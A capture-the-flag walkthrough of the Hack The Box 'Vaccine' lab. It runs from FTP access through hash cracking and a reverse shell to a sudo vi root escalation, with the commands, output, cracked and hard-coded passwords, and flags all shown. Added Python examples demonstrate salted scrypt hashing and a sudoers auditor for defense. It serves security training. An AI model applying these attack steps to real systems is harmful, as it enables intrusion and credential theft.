Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’
Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.
System Update and VPN Connectivity
Ensure your Kali Linux is updated for the latest functionalities and security patches:
$ sudo apt update
$ sudo apt full-upgrade -y
Establish a secure VPN connection to access the HTB environment:
$ sudo openvpn Downloads/starting_point_UserName.ovpn
Initial Reconnaissance with Nmap
Use Nmap to perform a comprehensive scan on the target system, identifying open ports and running services:
nmap -sC -sV -p- 10.129.239.94
┌──(toor㉿kali)-[~]
└─$ nmap -sC -sV 10.129.239.94
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 11:18 EST
Nmap scan report for 10.129.239.94
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.210
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
- Besides SSH and HTTP, what other service is hosted on this box? – ftp
- This service can be configured to allow login with any password for a specific username. What is that username? – Anonymous
- What is the name of the file downloaded over this service? – backup.zip
- Add the domain name to the local hosts file:
┌──(toor㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for toor:

┌──(toor㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# HTB
10.129.131.112  unika.htb
10.129.239.94   vaccine.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

┌──(toor㉿kali)-[~]
└─$
- Connect with ftp to the domain name, authenticate as Anonymous with any password, and download backup.zip:
┌──(toor㉿kali)-[~]
└─$ ftp vaccine.htb
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:toor): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10886|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |*********************************************************************************************************************************|  2533      774.21 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (60.43 KiB/s)
ftp> quit
221 Goodbye.

┌──(toor㉿kali)-[~]
└─$
- What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format that allows for cracking attempts? – zip2john
┌──(toor㉿kali)-[~]
└─$ locate zip2john
/usr/sbin/zip2john

┌──(toor㉿kali)-[~]
└─$
┌──(toor㉿kali)-[~]
└─$ zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(toor㉿kali)-[~]
└─$ cat hash
backup.zip:$pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*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*$/pkzip$::backup.zip:style.css, index.php:backup.zip

┌──(toor㉿kali)-[~]
└─$
┌──(toor㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(toor㉿kali)-[~]
└─$
┌──(toor㉿kali)-[~]
└─$ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:
  inflating: index.php
  inflating: style.css

┌──(toor㉿kali)-[~]
└─$ cat index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
┌──(toor㉿kali)-[~]
└─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

2cb42f8734ea607eefed3b70af13bbd3:qwerty789

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs)
Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 101376/14344385 (0.71%)
Rejected.........: 0/101376 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> ilovehim123
Hardware.Mon.#1..: Util: 14%

Started: Thu Nov 10 13:15:49 2022
Stopped: Thu Nov 10 13:16:14 2022

┌──(toor㉿kali)-[~]
└─$
- What is the password for the admin user on the website? – qwerty789
- https://crackstation.net/
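The index.php recovered from backup.zip compares md5($_POST['password']) against a hard-coded, unsalted digest, which is why hashcat recovers it from rockyou.txt in under a second. The following added example (written for this walkthrough, not code from the challenge or the original post) reproduces that weak check, shows how a tiny constructed wordlist defeats it, and puts the hardened alternative next to it: a per-user random salt, the slow memory-hard scrypt KDF, and a constant-time comparison. It is written in Python for illustration; the PHP equivalents are password_hash() and password_verify().

```python
import hashlib
import hmac
import os

# The digest from the challenge's index.php and a small constructed wordlist.
LEGACY_ADMIN_MD5 = "2cb42f8734ea607eefed3b70af13bbd3"
WORDLIST = ["123456", "password", "qwerty789", "letmein"]


def legacy_check(password: str) -> bool:
    """The weak scheme from index.php: unsalted MD5 compared with ==."""
    return hashlib.md5(password.encode()).hexdigest() == LEGACY_ADMIN_MD5


def wordlist_recovers_legacy(wordlist=WORDLIST):
    """Why the weak scheme fails: each candidate costs one fast md5() call,
    and the same digest is valid for every user who picked that password."""
    return next((w for w in wordlist if legacy_check(w)), None)


def hash_password(password: str, salt: bytes = b"") -> str:
    """Hardened scheme: 16-byte random salt, scrypt (n=2**14, r=8, p=1),
    stored as 'scrypt$<salt hex>$<digest hex>' so the salt and scheme
    travel with the record instead of living in source code."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, salt_hex, _digest_hex = stored.split("$")
    except ValueError:
        return False          # malformed record, never accept it
    if scheme != "scrypt":
        return False
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    print("legacy md5 recovered by wordlist:", wordlist_recovers_legacy())
    record = hash_password("qwerty789")
    print("stored record:", record)
    print("correct password verifies:", verify_password("qwerty789", record))
    print("wrong password rejected:", not verify_password("qwerty788", record))
```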
- What option can be passed to sqlmap to try to get command execution via the SQL injection? – --os-shell
- sqlmap -h
- https://www.revshells.com/
- nc mkfifo
python3 -c 'import pty;pty.spawn("/bin/bash");'
┌──(toor㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.138.183] 42756
sh: 0: can't access tty; job control turned off
$ whoami
postgres
$ find / -perm -4000 -type f 2>/dev/
sh: 2: cannot create /dev/: Is a directory
$ pwd
/var/lib/postgresql/11/main
$ cd /var/www/html
$ ls
bg.png  dashboard.css  dashboard.js  dashboard.php  index.php  license.txt  style.css
$ grep -i -R "pass" *
dashboard.php:          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
index.php:    if(isset($_POST['username']) && isset($_POST['password'])) {
index.php:      if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
index.php:      <label for="login__password"><svg class="icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label>
index.php:      <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>
style.css:.form input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password']:focus,
style.css:.login input[type='password']:hover,
$
┌──(toor㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host 'vaccine.htb (10.129.138.183)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 11 Nov 2022 02:39:29 PM UTC

  System load:  0.15               Processes:             187
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%                IP address for ens160: 10.129.138.183
  Swap usage:   0%

0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$
- https://gtfobins.github.io/gtfobins/vi/
postgres@vaccine:~$ ls
11  user.txt
postgres@vaccine:~$ cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# whoami
root
# cd /root
# ls
pg_hba.conf  root.txt  snap
# cat root.txt
dd6e058e814260bc70e9bbdef2715849
#
- What program can the postgres user run as root using sudo? – vi
- user flag – ec9b13ca4d6229cd5cc1e09980965bf7
- root flag – dd6e058e814260bc70e9bbdef2715849
- https://www.hackthebox.com/achievement/machine/303878/289
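The root step works because the sudo rule restricts vi's argument but not vi itself, and vi can spawn a shell (the GTFOBins entry linked above). The added example below (written for this walkthrough, not part of the challenge or the original post) is a small sudoers auditor a defender can run over a configuration: it parses sudoers-style rules, flags any command whose basename is an interactive editor or pager with a known shell escape, and suggests sudoedit, which lets a user edit a root-owned file through a temporary copy without ever running an editor as root. The sample rules, including a copy of the one seen on the box, are constructed for the example.

```python
import os
import re

# Programs with documented shell escapes or arbitrary-file access (a subset, not exhaustive).
ESCAPE_CAPABLE = {"vi", "vim", "view", "nano", "less", "more", "man", "ed", "emacs"}

# user host=(runas) [TAG:] command [args][, command [args]...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

SAMPLE_SUDOERS = """\
# constructed sample; the first rule reproduces the one from sudo -l on the box
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/lib/postgresql /backup
dba      ALL=(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf
"""


def parse_rules(text: str):
    """Split user-specification lines into one dict per command; skip comments and Defaults."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = RULE_RE.match(line)
        if not m or line.startswith("Defaults"):
            continue
        for spec in m.group("cmds").split(","):
            parts = spec.strip().split()
            rules.append({"user": m.group("user"), "runas": m.group("runas") or "root",
                          "nopasswd": "NOPASSWD" in m.group("tags"),
                          "cmd": parts[0], "args": parts[1:]})
    return rules


def audit(text: str):
    """Return one finding per rule that hands out a shell-escape-capable program."""
    findings = []
    for r in parse_rules(text):
        if os.path.basename(r["cmd"]) in ESCAPE_CAPABLE:
            fix = "sudoedit " + " ".join(r["args"]) if r["args"] else "a wrapper that cannot spawn a shell"
            findings.append(f"{r['user']} may run {r['cmd']} as {r['runas']}: "
                            f"editor shell escape yields a root shell; use {fix}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print(finding)
```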
Ethical Hacking Reminder
This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.